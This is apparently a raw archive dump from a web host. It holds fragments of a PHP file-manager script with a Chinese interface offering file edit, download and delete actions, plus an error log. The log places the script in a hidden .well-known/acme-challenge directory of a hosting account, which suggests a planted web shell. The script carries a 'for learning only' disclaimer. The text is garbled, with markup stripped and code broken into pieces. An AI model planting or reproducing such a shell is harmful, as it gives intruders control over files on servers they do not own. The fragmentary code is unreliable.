649405/index.php 0000644 00000025673 15021154664 0007160 0 ustar 00 999852
{$file}
返回
名称 | 类型 | 大小 | 修改时间 | 操作 |
---|---|---|---|---|
'; if($is_dir) { echo ''; echo '📁 '; echo htmlspecialchars($file); echo ''; } else { echo '📄 '; echo htmlspecialchars($file); } echo ' | '; // 类型列 echo ''.($is_dir ? '文件夹' : '文件').' | '; // 大小列 echo ''.format_size($is_dir ? 0 : filesize($full_path)).' | '; // 修改时间 echo ''.date("Y-m-d H:i", filemtime($full_path)).' | '; // 操作列 echo ''; if (!$is_dir) { echo '编辑'; echo '下载'; echo '删除'; } echo ' |
仅供学习,勿用于非法用途。
'; echo ''; 649405/error_log 0000644 00000000347 15021154664 0007244 0 ustar 00 [04-Jun-2025 22:50:45 America/New_York] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/abhiramc/public_html/newsroom/OLD/.well-known/acme-challenge/649405/index.php on line 2 index.php 0000644 00000000000 15021154664 0006356 0 ustar 00